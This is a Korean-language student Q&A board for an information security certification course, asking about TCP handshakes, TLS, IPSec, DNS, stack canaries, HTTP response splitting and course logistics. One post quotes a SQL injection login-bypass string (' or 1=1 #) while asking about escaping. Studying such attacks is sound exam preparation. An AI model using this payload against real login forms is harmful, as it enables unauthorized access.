질문에 대한 답변 감사드립니다 그런데 제가 여쭤보고 싶었던건 ①ACK - ②FIN+ACK - ③ACK - ④FIN+ACK - ⑤ACK에서 두번째 FIN+ACK에 대해서 입니다 제가 이해한건 ①ACK에서 Seq = 7013 / Ack = 7857이였으니 ②패킷의 Seq = 7857이고 ①의Seq=7013이였으니 ②의 Ack는 7014로 줘서 ③의 Seq는 7014가 되야하는것으로 생각했습니다 Sequence Number는 패킷마다 1씩 증가되는 방식이 아닌건가요?? 예를들어 A가 B와 통신할때 A의 ISN이 a이고 B의 ISN이 b일때 a/b a+1/b+1 , a+2/b+2 ... 이런방식으로 증가되는게 아닌건가요?? 아니라면 Sequence Number와 Ackknowledge Number는 언제 증가되는건지 궁금합니다

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-02-28
답변완료

SSL/TLS 질문 하나드립니다.

SSL/TLS 질문 하나드립니다. Handshake프로토콜이 보안파라미터 협상할 때 사용하는 프로토콜이잖아요? 이때 보안파라미터를 협상하기 위해 13단계 완전협상 과정을 거쳐서 협상을 하게 되는데 궁금한 점이 Handshake프로토콜 자체가 13단계로 이루어져있는 건가요? 아니면 13단계 완전협상과정을 수행할 때 Handshake프로토콜을 사용하는 건가요? 개인적으로 프로토콜은 통신규약으로 이용하는 거라 알고있어서 후자가 맞는 거 같은데 또 혹시 몰라서.. 용어적인 면에서 헷갈리게 정리해두면 나중에 지식이 짬뽕이 되기 때문에 질문드립니다 ㅠ 아무래도 후자가 맞겠죠? 보안파라미터(보안설정 정보)를 협상하기 위해 13단계 완전협상과정을 수행하는데, 이때 사용하는 프로토콜이 보안파라미터(보안설정 정보)를 협상하기 위한 Handshake프로토콜을 사용한다. 답변주시면 감사하겠습니다 ( _ _ )

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-02-27
답변완료

일시정지문의

안녕하세요 일시정지 관련해서 문의드렸는데 단과상품의경우 안된다는 답변을받았습니다. 정보보안기사 1년 프리패스구매했는데 해당상품도 일시정지가 안되나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

정수연 2022-02-26
답변완료

IPSec 터널모드 관련 질문드립니다.

https://cafe.naver.com/algisa/47938 카페에 질문글 올렸습니다. 답변주시면 감사하겠습니다

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-02-26
답변완료

2022년 실기 인강 업데이트

2021년 실기 이론 인강만 구매해서 공부중입니다. 2022년 실기 이론 인강이 나오면 따로 구매해야하나요? 아니면 업데이트가 되는건가요..?!

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김민경 2022-02-25
답변완료

강사님 아직 22년 강의가 업데이트가 안된 건가요??

안녕하세요. 작년 8월쯤 인강을 듣고 시험을 봤는데 아쉽게 떨어져서 다시 실기 인강을 1월중에 구매하여 수강 중인데요 네이버 카페 게시물(https://cafe.naver.com/algisa/47888)을 확인해보니 아직 업데이트가 안된거라고 하더라구요 그런데 저는 지안패스로 구매한 것이 아니라 실기 인강만 구매한 것 같은데 22년 업데이트가 되면 업데이트 부분을 보려면 인강을 다시 구매해야 하나요?? 문득 생각나서 질문드립니다.. 감사합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-02-25
답변완료

Sequence Number관련 질문드립니다

보안기사 실기 43강 약52분쯤 실습에서 wiershark로 4way-handshaking설명해주실때요 해당 실습 wireshark에서 Sequence Number랑 Acknowledge Number관련해서 이해가좀 안가서요 패킷이 ACK로 마지막패킷 받은후 FIN+ACK - ACK - FIN+ACK - ACK로 4way-handshaking과정이 진행됬는데요 마지막 ACK에 ACK.Number 끝4자리가 7857이라서 FIN+ACK패킷의 Seq.Number가 7857이 됬다는건 이해했는데요 FIN+ACK패킷의 ACK.Number가 7013인것이 이해가가지 않습니다 7014여야 맞는거 아닌가요?? 183page 3way-handshaking설명해주실때 SYN+ACK의 Seq.Number=2000이고 Ack.Number=1001일때 다음 ACK패킷의 Seq.Number=1001이고 Ack.Number=2001로 된다고 설명해주셨었는데 이와같이 생각해보면 위의 4way-handshaking에서도 FIN+ACK패킷의 Seq.Number가 7857이였으니 ACK패킷의 Ack.Number=7014가 맞다고 생각했는데 아닌가요?? Seq.Number와 Ack.Number가 카운트되는 방식이 해깔리네요... 설명좀 부탁드릴께요

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-02-25
답변완료

GARP관련 질문드립니다

GARP를 통해서 IP충돌을 확인한다고 말씀해주셨는데요 말씀해주신 Src IP와 Dst IP가 동일한 경우의 패킷을 받았을때 Src IP도 자기가 가진 IP라면 응답을 안하는게 맞지않나요?? 예를들어 192.168.10.10이라는 IP애 대해서 Src IP : 192.168.10.10 / Dst IP : 192.168.10.10이라는 GARP패킷을 만들어 브로드캐스트로 전송했을때, 192.168.10.10을 중복하여 사용하고있는 Host가 해당패킷을 받는다면 응답할때 목적지가 192.168.10.10이 되는데 이걸 응답을 해주는건가요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-02-23
답변완료

DNS서버관련 질문드립니다

일반적으로 기업에서 DNS서버를 운영할때 Recursive DNS서버와 Authoritative DNS서버를 각각 운용하는건가요?? 기업내부 사용자들이 Recursive쿼리를 할때는 Recursive DNS서버로 쿼리를 하고 외부 Recursive DNS서버(ex KT DNS)가 Iterative 쿼리를 할때는 Authoritative DNS서버에 쿼리를 하는 방식이라고 생각하면 될까요?? 이렇게 운용되어서 보안설정시 Authoritative DNS서버에서는 Recursive Query를 막아놓고 Iterative Query만 허용해놓는거라고 생각했는데 맞나요?? 이게 맞다면 DNS서버가 수신한 Query가 Recursive Query인지 Iterative Query인지 구분할수있는 파라미터가 Query패킷내에 있나요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-02-22
답변완료

전자필기장

인강에 나오는 전자 필기장? 연습장은 따로 파일이 없는건가요??ㅠㅠ

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김민경 2022-02-21
답변완료

HTTP 응답 분할 취약점 질문입니다.

선생님 안녕하세요. 코로나 조심하시고,, 건강 조심하십시오! 질문을 자주 드리네요. HTTP 응답 분할 취약점에서 궁금한데. Content-Length : 0 으로 설정해서 CRLF (헤더의끝), CRLF(empty line) 로 설정하면 브라우저 입장에서는 더 이상 읽어들일 데이터가 없구나 하고 뒤에 나오는 공격자의 조작된 응답을 읽어 들이지 않는 그런 설정은 없는걸까요? 그리고 응답 헤더에서 Content-Length : 0 과 empty line이 나오면 당연히 응답헤더 끝났구나 라고 브라우저에서 똑똑하게 뒤에 조작된 응답을 안읽어 들일거같은데요 ㅜ 브라우저에서 응답이 2개가 내려오는데, 제가 막연하게 직관으로 느꼇을때 1요청 1응답이 정상적으로 보이는데 1요청 2개의 응답을 읽어드리는게 뭔가 좀 이상해보여서요;

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-02-20
답변완료

2022년 강의는 언제올라오나요?

2022년 강의는 언제올라오나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이수연 2022-02-17
답변완료

강사님 두번째 질문입니다.

-> 질문1. 가령 TLS_RSA_WITH_AES_256_CBC_SHA265 이라고 한다면 책에서는 키교환 및 인증 알고리즘으로 RSA를 사용한다고 되어있습니다. 서명이 빠진이유는 DHE 공개 매개변수에 대한 서명이 필요 없기 때문에, 즉 DHE로 키교환을 하는 것이 아니기 때문에 서명이라는 개념이 빠진걸까요? -> 질문2 여기서 서버로부터 받은 RSA 서버 인증서는 CA에서 발급 한걸수도 있고, 자체적으로 생성한 인증서 일수도 있는 걸까요? 더불어 이전에 강의에서 봣을 때 Open SSL이란 프로그램을 이용해서 생성한걸 본거같은데 맞을까요? -> 질문 3. 제가 자꾸 CA개념을 들먹어서 죄송합니다. google.com , naver.com 등 전부 CA에서 발급한 인증서만 봐서요. 그럼 첨부그림의 인증서 RSA(2048bit) 공개키로 Premaster Secret를 공개키로 암호화하여 서버측으로 전달하고 , 서버에서는 강사님이 말씀하신것처럼 별도의 파일 형식으로 서버쪽에 비밀스럽게(안전하게) 보관된 개인키 파일을 이용해서 복호화하여 Premaster+ client Random + serverRandom 조합하여 키블럭을 생성 하는걸 까요? ->질문 4. CA를 통해서 생성된 서버의 개인키, 공개키 여기서 제가 좀 이해가 안가는게 저 공개키라는 것이 CA에서 부여한 웹 서버에 대한 공개키 라는 걸까요? 첨부한 그림의 인증서 공개키 일까요? 클라이언트에서 이게 맞는 올바른 CA에서 발급한 인증서다 라는 걸 체크할 때 는, CA로 올바른 인증서인지 확인 하는 통신? 과정을 잘 모르겠습니다. 제가 뇌피셜로 추측하기로는 공인된 CA에서 algisa.com 에 대한 인증서를 발급해줄게(비용은 지불) 예를들어 베리사인에서 algisa.com 이 웹서버는 공개키로 ‘abcs’를 쓰고 개인키로 ‘1234’써서 인증서 발급 해줄게.클라이언트에서 이게 올바른 인증서다 라는걸 클라이언트에서 검증할때는 베리사인쪽으로 통신 요청 해서 클라이언트 : 베리사인아 이거 인증서 안의 공개키가 ‘abcs’(RSA 2048bits) 인데 이거 맞아? 베리사인 : 어 그거 올바른인증서맞아 . 하고 검증 하는걸까요? ->질문 5.인증서 안에서는 최상위 CA-> 중간 CA- > 대행자 CA 계층적이라고 알려주셔서요, 그럼 위의 그림 인증서에는 계층적으로 발급자 정보가 다 들어가 있는걸까요? 그리고, 모든 전 세계 웹사이트의 서버 인증서의 서버에 대한 공개키 관리는 CA에 관리 되고 있으며, 웹 서버의 공개키는 전부 다 달리 발급되어 인증서 형태로 발급 되는 걸까요.? 가독성을 좋게 드리려고했는데 알기사 게시판 줄 간격 저장이 안되네요 ㅜㅜ 이점 양해 부탁드리겠습니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-02-16
답변완료

SSL/TLS 완전 협상 과정 질문드립니다.

 총체적인 난국이.. 서버를 인증한 인증서의 공개키 , 개인키 , 서버에서 생성한 공개키, 인증키가 햇갈립니다.. ㅜ 실기 책 290페이지 (라) Server Key Exchange 메세지에서 DHE를 사용한다면 디피헬만 공개 매개변수를 서명알고리즘 으로 서명하여 서명값과 함께 전달한다. 라고 되어있는데 여기서 서명알고리즘은 DSS가 될것이고 DSS도 상위 기관(CA) 에서 발급한 인증서로 되어있는걸까요? 서명값은 상위기관에서 발급한 인증서의 개인키로 서명하여 인증값이 생성되어 서명하여 클라이언트에 전달하는건가요? 두번째로 완전 협상 Client Key Exchange 메시지에서 RSA 방식 : 프리마스터 생성후 수신한 서버인증서의 공개키를 이용하여 암호화 전송 여기에서 수신한 서버 인증서는 CA가 서명한 인증서의 공개키값을 이용하여 암호화 전송되는 것인지 아니면 서버에서 자체적으로 생성한 공개키값 인것인지 햇갈립니다. 세번째, 책에서 표현하는 서버 인증서의 공개키, 개인키는 CA의 공개키 개인키를 말하는 걸까요 아니면, 서버에서 자체적으로 생성한 인증서안에 들어가 있는 서버의 개인키 공개키를 뜻하는걸까요? 총 정리해서 제가 햇갈리는걸 말씀드리면 CA의 공개키, 개인키 진짜 인증서인지 확인할때만 필요하고. SSL인증서의 진위 여부 파악 을 클라이언트에서 검증이 끝나면, 이후 사전 마스터 비밀 전달할때 사용하는 서버 인증서의 공개키를 이용하여 암호화 되는것은 SSL 인증서 내에 삽입된 웹서버의 공개키를 말하는것인지..? .. 햇갈립니다 ㅠㅠ 

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-02-14
답변완료

안녕하세요!!

쌤 마지막 139강이 중간에 잘린 것 같은데... 맞나요...??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

임도윤 2022-02-14
답변완료

안녕하세요!

쌤 안녕하세요 RSA의 디지털 서명 부분에서 학습하다 궁금한게 있어서요. 보충자료를 보면, '메시지에 대한 해시값을 송신자의 개인키로 암호화하여 전달, 수신자는 송신자의 공개키로 이를 복호화한 후 이를 검증한다' 라고 쓰여 있는데요. 송신자가 본인의 개인키로 암호화를 한 '내용'이 수신자 입장에서 송신자의 공개키로 복호화....가 된다는 말인가요? 서로 쌍이기 때문에 가능한 거죠?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

임도윤 2022-02-13
답변완료

강의화면 에서 페이지가 5이상나오지 않아요

예전에 한페이지당 20강 100강이 이후도 강의듣고 이동이 가능했는데 팝업창에서 강의차수가 99강 이후로 이동이 불가능하네요 본화면에서 선택하고 팝업에서는 이동이 불가능 해서 불편합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강순현 2022-02-12
답변완료

2021년 강의 관련해서 질문입니다.

과정은 2021년으로 되어 있는데 2022년 과정 강의 오픈 전에 임시로 2021년 강의를 오픈 해주시는 건지요? 아니면 2021년으로 계속 지속 되는 건지요? 실기 책을 구매 하려고 하는데 2022년 강의가 새로 나오면 다시 구매 해야 할 것 같아서 어떻게 해야할지 몰라 질문 드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

최은경 2022-02-10
답변완료

실기관련하여 프로그램을 받을 수 있는 곳이 있나요??

실기관련하여 프로그램을 받을 수 있는 곳이 있나요?? 생각했던 것 보다 강의가 너무 자세하게 해주셔서 잘 듣고 있습니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

유지훈 2022-02-05
답변완료

모바일 기기 사용 등록 건

22년 .1월 4일로 정보보안 실기 인터넷 강의 수강신청했습니다. (모바일+PC) 모바일 수업 StarPlayer 기 인증된 기기가 있어 학습이 불가능합니다. 기존 : 안드로이드 현재 : ios 사용중 변경 부탁드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

신상민 2022-01-04
답변완료

강의중 실습 프로그램는 어디에서 찾을 수 있나요 ?

강의중 실습 프로그램은 어디서 찾아요 ?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김영일 2021-12-28
답변완료

쌤 안녕하세요

쌤 안녕하세요 다름이 아니라, 이번에 log4j 사건들에 대해서 혹시 특별 강의 같은 것은 없는지 좀 알고 싶습니다 ㅎㅎ 요새 정보보안을 공부하고 있어서 그런지 관심이 많은데, 쌤 처럼 원리부터 차근차근 설명해주시는 분이 없어서요. ㅠㅠ 항상 좋은 강의 감사합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

임도윤 2021-12-28
답변완료

용어가 잘못 표기된게 있는거 같습니다.

정보보안일반관리 부분에 단일예상손실액이 SLA라고 되어있는데 SLE로 되어야 맞는거 같은데 확인 부탁드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이상석 2021-10-28
답변완료

개인정보보호법 관련 질문

개인정보의 안전성 확보조치기준?? 기술적,관리적 보호조치기준?? 문의드립니다. ​ ​ 알기사 동영상 강의 참고 자료에 개인정보 안전성 확보조치기준과 기술적, 관리적 보호조치기준 이렇게 두개를 나누어서 정리해 주신 참고자료가 있는데요.. ​ 좀 이해가 안되어서 문의드립니다. ​ 기술적,관리적 보호조치기준이 원래 정보통신망법에 있다가 폐지된걸로 알고 있는데요..? 맞는건가요?? ​ 폐지되고 나서 개인정보보호법으로 기술적,관리적 보호조치기준으로 옮겨가게 된건지요?? ​ 결과적으로 현재 개인정보보호법에 개인정보 안전성 확보조치기준과 기술적,관리적 보호조치기준 모두 포함되어 두개 모두 외워야 하는건가요?? ​ 답변 부탁드립니다.. ​ ​

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김성훈 2021-10-25
답변완료

91강 robots.txt 파일 질문

User-agent: * Disallow: / Allow : /$ 네이버에 robots.txt 파일을 열어봤는데 질문이 있습니다. 모든 유저에 대해 모든 접근을 차단한다. 까지는 알겠는데 그 뒤에있는 /$는 어떤 의미인가요 ? 네이버가 들어간 url에대해서는 허용한다는 뜻인가요 ?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

권순우 2021-10-15
답변완료

71강 ftp 관련 질문

ftp 111.111.111.111 명령어를 통해 111.111.111.111 서버에 접속하고 그 후에 사용자아이디, 비밀번호를 입력할때 어떤 사용자아이디인지 잘 모르겠습니다. 111.111.111.111이 포함된 네트워크에 존재하는 사용자의 아이디, 비밀번호인가요 ? 아니면 별도의 허가가 있는 명령어를 입력하는 네트워크의 사용자의 아이디, 비밀번호 인가요 ? 감사합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

권순우 2021-10-11
답변완료

69강 어플리케이션 기본 학습의 DNS 캐시 포이즈닝 관련 질문.

323p에 대응책 2번에 보면, recursive 질의를 허용하지 않도록 설정한다고 되어있습니다. recursive나 iterative 질의는 출발지(소스), 목적지 주소와 트랜잭션 id가 같을텐데, recursive dns 서버가 authoritative 서버에서 오는 iterative 질의와 공격자의 recursive 질의를 구분 할 수 있는 방법이 있나요 ? 감사합니다

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

권순우 2021-10-09
답변완료

7강에서 c파일 컴파일 시 결과값 문의

fork() 함수 반환 시 결과값이 1차적으로 자식 프로세스의 PID로 알고 있습니다. c언어 소스코드 상 pid=fork(); 의 부분에서 pid 는 양수로 생각 됩니다. pid가 양수이기 때문에 if(pid > 0)의 조건문이 먼저 실행되야 맞는 사항으로 생각되는데 else 조건문이 먼저 실행되는 이유를 문의드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

염희수 2021-09-30
답변완료

정보보안산업기사 실기 준비중입니다.

정보보안기사에만 나오는 강의는 건너뛰어서 강의를 듣고싶습니다. 몇강몇강이 정보보안기사에만 나오는 강의인가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김동일 2021-09-26
답변완료

16강 슈퍼데몬 서비스별 설정파일 cps 관련 질문

예시로 cps 50 10 이면 초당 50개의 연결만 제한 하고, 이를 넘는 연결 요청이 올 경우 10초간 일시중지 후 서비스를 개시한다. 라고 되있는데, 결국 초과로 요청된 연결 요청은 해결이 되지 않은것 아닌가요 ? 일시중지를 함으로써 어떤 동작이 되는 것인지 잘 모르겠습니다. 그냥 단순히 연결요청을 전부 거절하고 다시 사용자의 연결요청을 받는것 인가요 ?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

권순우 2021-09-24
답변완료

강의 자료 문의

안녕하세요, 2021 정보보안기사 강의 수강생 입니다. '10강 crontab 접근제어' 강의 중 41:25에서 강의 자료로 설명해 주시는 부분이 있는데 강의에서 쓰시는 강의 자료와 올려주신 강의 자료와 조금 달라서 문의드립니다. 올려주신 자료에서는 "두 파일 모두 없는 경우 데비안과 우분투 배포판은 이 경우 모든 사용자에게 실행 권한을 준다"고 되어있는데 맞는 내용인가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김수빈 2021-09-14
답변완료

4-way handshake 실습에 관해 질문이 있습니다.

4-way handshake 실습을 따라하던 중 질문이 생겼습니다. 192.168.176.128(CentOS7), 192.168.176.129(Kali Linux) 환경에서 Kali가 CentOS7으로 telnet접속을 하고, CentOS7를 shutdown하여 연결을 종료했습니다. 이 과정을 wireshark로 패킷 확인 했는데, FIN+ACK, ACK, FIN+ACK, ACK가 아닌 FIN+ACK, FIN+ACK, ACK가 확인되었습니다. 어떤 이유로 이렇게 나왔는지, 제가 했던 과정에 어떤 문제가 있었는지 궁금합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이차란 2021-09-13
답변완료

질문드립니다.

강사님 강의 정말 잘보고있습니다. 실습하는데 윈도우 7에서 ipconfig /display 하면 원하는 dns 정보가 나오지 않는데 어떤점을 확인해봐야할까요? ㅜ.ㅠ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

고승균 2021-08-11
답변완료

연습장 자료 제공

강의를 듣다보니 연습장에 정리하신 자료가 있는데 그 자료는 제공이 안되는 건가요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박수진 2021-08-07
답변완료

연습장 내용은 어디서 다운 받을 수 있나요??

2강 유닉스 리눅스 시스템 기본학습에 연습장 내용은 어디서 다운 받을 수 있을까요...?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지훈 2021-07-20
답변완료

(1:1 문의에 올려둔 질문이 더 보기 편하실 것 같아요~!)스택오버플로우에 대해서 또 카나리에 대해서 질문이 있슴니다!

말이 두서가 없을테지만 이런식으로 생각하는게 맞나 싶어서요! ------------------------------------------------------------- sp= 함수 수행 시 할당( 스택연산이 발생하는 위치 ) SFP= 함수 수행 시 특정 위치의 기준점 (?) 이 sp 를 저장하는 레지스터가 ESP 이고 SFP 를 저장하는 레지스터가 EBP 그 다음 명령을 저장하는 지점이 EIP 이니 SFP 가 변경 시 마다 EIP 도 다음 명령어가 존재할 시에 바뀌는 것이겠구요. SFP 가 이동할 때 마다 그 기준점 기준으로 data가 쌓이는 거구요. 여기서 오버플로우가 일어나면 RET 까지 SFP가 이동하여 DATA를 저장해 버리는 것이 오버플로우의 개념이 맞나요? 맞다면 여기에서 스택가드의 카나리가 어느지점에 들어가는 지 헷갈립니다 ------------------------------------------- ------------------------------------------------------- "스택가드는 추가의 함수진입과 종료코드를 삽입한다"라고 하는데 이것이 canary 값을 삽입한다는 뜻으로 이해해도 되는 걸까요? -------------------------------------------------------------------------------------------------------- 네 이런식으로 이해한다면 추가되는 " 함수 진입 코드는 지역변수를 위한 공간을 할당하기 전에 이전 SFP 앞에 canary를 기록한다. 추가되는 함수 종료 코드는 이전 SFP를 복원하고 제어를 반환주소로 이동하는 보통의 함수 종료 연산을 수행하기 전에 canary 값이 변경되었는지 검사한다." 라는 말을 하나씩 풀어서 이해해보자면 이전 SFP 사이에 canary(함수 진입, 종료 코드)를 할당한다. // 이후 sfp가 아닌 ret 근처에 들어가는 것이 맞지요? ----------------RET----------------------------- (함수종료코드) canary (함수진입코드) -----------------이전 sfp------------------------- 라는 그림이 그려지는 것이 맞나요? 이게 맞다고 가정하면 실질적인 반환주소에 가기 전 canary의 함수 진입코드와 종료코드를 거쳐 연산이 반환되기 전에 임의의 RET값을 수행하여 canary 값을 계산해 본다 라는 말이 될까요? ---------------------------------------------------------------------------------------------------------- 이때 버퍼오버플로우 시도가 발생되었다고 가정하면 SPF 의 값과 RET을 변경이 될 때 canary값도 변경이 되었기에 변경이 된 것을 확인하면 공격으로 인지하고 프로그램이 종료가 되는 것 맞나요? 물음표 투성이네요ㅠㅠ..... 교수님 ㅠㅠ 근데 여기 엔터가 안들어가서 읽기 불편하실 것 같아요 ㅠㅠㅠㅠ 1:1문의에 올려둔 글이 더 보기 편하실 것 같은데 괜찮으려나 모르겠네요

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

주현지 2021-06-10
답변완료

질문있습니다!

지금 snort 공부를 하고 있는데 우연히 탐지패킷로그는 pcap형식으로 tcpdump나 wireshark같은 패킷분석도구를 통해서 패킷내용을 확인할 수 있다고 나와있어서 질문드립니다. 1. snort와 tcpdump의 상관관계가 어떻게 되나요 2. snort와 tcpdump는 그냥 기능적으로 패킷 스니핑용으로 비슷한건가요?? 3. tcpdump는 흘러가는 패킷을 스니핑을 해서 와이어샤크처럼 보는 걸로 알고 있었는데 교재안에 alert로 탐지패킷로그를 남기면 tcpdump로 패킷내용을 확인할 수 있다고 해서 헷갈린건데 tcp가 흘러가는 패킷 스니핑을 해서 일시적으로 보는 기능인가요 아니면 저장해있는 로그를 분석하는 용도인가요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

금강민 2021-05-15
답변완료

HTTP 응답 분할 취약점 질문드립니다.

첫번째 응답을 개행문자와 Content-Length : 0을 이용하여 종료하고 두번째 응답에 공격자가 만든 스크립트를 삽입한다는 동작원리는 이해했습니다. 근데 첫번째 응답에 바로 공격자가 만든 스크립트를 삽입 할 수 는 없는것인지 왜 응답을 굳이 2개로 나누는지 이해가 되지 않습니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

임승훈 2021-05-09
답변완료

강사님 질문있습니다!

안녕하세요 현재 sql인젝션부분을 공부하고 있습니다. 강의를 듣다가 갑자기 궁금증이 생겨 질문드립니다. php.ini 설정파일에서 magic_guotes_gpc를 on을 한다면 특수문자를 escape처리를 한다고 배웠습니다. 그럼 혹시 입력값을 '' or 1=1 #을 한다면 where id = '/'' or 1=1 # pass=''이 되서 아이디 입력값을 /'으로 인식하고 뒤에 1=1은 참이라 공격이 먹히는게 아닌건지 궁금합니다!

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

금강민 2021-05-09
답변완료

TTL os finger printing 에 관한 질문입니다

TTL 이 os fingerprinting이 될 수 있다고 배웠습니다. 그런데 이 TTL 값이 ping을 보내는 클라이언트의 os 에 대한 정보인지 ping을 받는 서버에 대한 정보인지 교재에는 확실하게 써 있지 않은 것 같아 문의드립니다. (스스로 가상머신에다가 테스트 해봤는데)ping을 받는 쪽에 대한 os 정보를 알려주는 것 같지만, 확실히 하고 싶어서 문의드립니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

이창모 2021-05-05
답변완료

28강 PATH 설정 관련 문의드립니다.

안녕하세요 교수님 정보보안기사 실기 강의 잘 듣고 있습니다. 다름이 아니라 28강 PATH 설정 관련하여서 문의드립니다. 보안설정으로 PATH 변수를 경로 맨 앞 또는 중간에 "."가 포함되어 있는 지 확인하여 맨 뒤로 이동시키거나 삭제라고 되어 있는데요. 실제 동영상 강의 내용에서 현재 디렉토리(.)를 PATH 에 추가하는 내용은 있는데 실제 취약한 PATH 설정에 대해서 "."를 삭제 할 때는 어떤 식으로 명령어가 사용하는지도 중요할 것 같은데 명확히 안 나와 있는 것 같습니다. 확인 부탁드립니다. 감사합니다!!

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김상길 2021-05-03
답변완료

암호학파트 상세히 설명해주시나요..?

아직 강의가 없어서 불안한 마음에 여쭤봅니다. 이쪽 파트가 약한편이라서요 ㅠㅠ..

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

주현지 2021-05-02
답변완료

스머프어택 질문있습니다.

대응책중에 브로드캐스트 주소로 전송된 ICMP Echo Request 메시지에 대해 응답하지 않도록 시스템 설정을 한다. 부분에서 이 시스템 설정을 하라는 게 희생자PC인가요? 아니면 Amplifier 네트워크인가요?? 당연히 대응책이니 희생자PC이긴 하겠지만, Request메시지에 대한 응답이면 증폭네트워크가 하는 것 같아서 이해가 안되서 질문드립니다!

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

금강민 2021-05-02
답변완료

강사님 질문이 있습니다!

공부하다 보면 IP주소가 예를 들어 192.168.212.0/24 : IP대역 이렇게 적혀 있는 부분이 있는데 0/24 라는게 0~255다 이런 의미인가요? 아니면 0~24 이런 의미인가요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

금강민 2021-05-02
답변완료

교수님 질문있습니다.!

현재 2021년 실기 이론편 189쪽을 보고 있습니다. 44강을 보고 궁금증이 생겼습니다. TCP 세션 하이재킹 부분에서 그림안에서 3번을 보면 공격자가 클라이언트의 IP를 스푸핑하고 seq넘버와 ack넘버를 그대로 예측해서 보내고 페이로드 길이를 바꿔서 보낸다고 하셨는데 첫번째 질문 : 클라이언트와 서버가 연결상태라면 처리 속도가 빠를텐데 그 타이밍을 어떻게 맞추는지 두번째 질문 : 서버 입장에서는 클라이언트와 공격자가 거의 동시에(그림 상 클라이언트 패킷이 먼저오고 공격자의 패킷이 온 상황) 패킷이 왔는데 왜 공격자의 패킷으로 클라이언트한테 대답을 주는 건지 궁금합니다!!

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

금강민 2021-05-01
답변완료

교수님 질문있습니다!

ICMP Redirect공격은 L2스위치환경에서 일어난다고 하셨는데, 복습하다보니 궁금증이 생겼습니다. 경로 설정이라면 IP 헤더에 있는 목적지 IP를 가지고 일어나고 공격도 라우터/게이트웨이에서 일어난다고 하셨는데 왜 3계층이 아니고 L2스위치 환경에서 일어나는지 궁금합니다!

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

금강민 2021-04-29
답변완료

IPSec 터널모드 비보호 구간의 의미

터널 모드의 경우 종단(송신) - 게이트웨이 - 인터넷 - 게이트웨이 - 종단(수신) 이러한 구조가 있다고 할 때 ----------IPSec 적용구간---------- (교재 p276)종단 노드 ~ 게이트웨이 구간은 비보호 구간, 게이트웨이 ~ 게이트웨이 구간은 IPSec 적용 구간이라고 나와 있습니다. 질문 1. 이 두 구간의 차이가 무엇인가요? 원본 IP 헤더와 페이로드를 IPSec헤더(와 트레일러) 및 New IP로 감싼 상태로 메시지가 오고가는 구간을 IPSec 적용 구간, 아닌 부분을 비보호 구간이라고 표현한 건가요? 질문 2-1. 만약 원본 IP+페이로드를 IPSec으로 감싼 부분이 IPSec 적용 구간이라면, 비보호 구간인 종단 노드~게이트웨이 구간은 원본 IP가 (암호화되지 않고) 그대로 노출되는 구간이라고 생각됩니다. 그렇다면 ESP/터널모드의 경우 "원본 IP 헤더는 암호화되어 있기 때문에 터널/보안 게이트웨이와 종단 노드 구간의 트래픽 흐름의 기밀성이 보장된다"는 틀린 말인가요? 원본 IP 패킷이 오고가니까요. 그렇다면 이 구간도 공격자가 스니핑을 통해 트래픽 흐름을 알 수 있는 구간이 되지 않을까요? 질문 2-2. 만약 비보호 구간도 IPSec으로 감싼 부분이라면, 종단 노드와 게이트웨이는 New IP 헤더의 주소 정보를 통해 메시지를 주고 받나요? 그렇다면 ​New IP 헤더 정보가 송신지부터 수신지까지 계속 드러나있기 때문에 트래픽 흐름의 기밀성이 보호가 안 되는 것 아닌가요? 질문 3. 터널모드에서 종단 노드와 게이트웨이는 원본 IP 헤더 정보를 바탕으로 메시지를 주고 받나요, 아니면 New IP 헤더 정보를 바탕으로 메시지를 주고 받나요? 어떤 주소 정보를 통해 메시지를 주고 받는지 궁금합니다. 질문이 많지만 중요한 부분이라 꼭 답변 부탁드립니다 교수님 ㅠㅠ

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

이창모 2021-04-12
답변완료

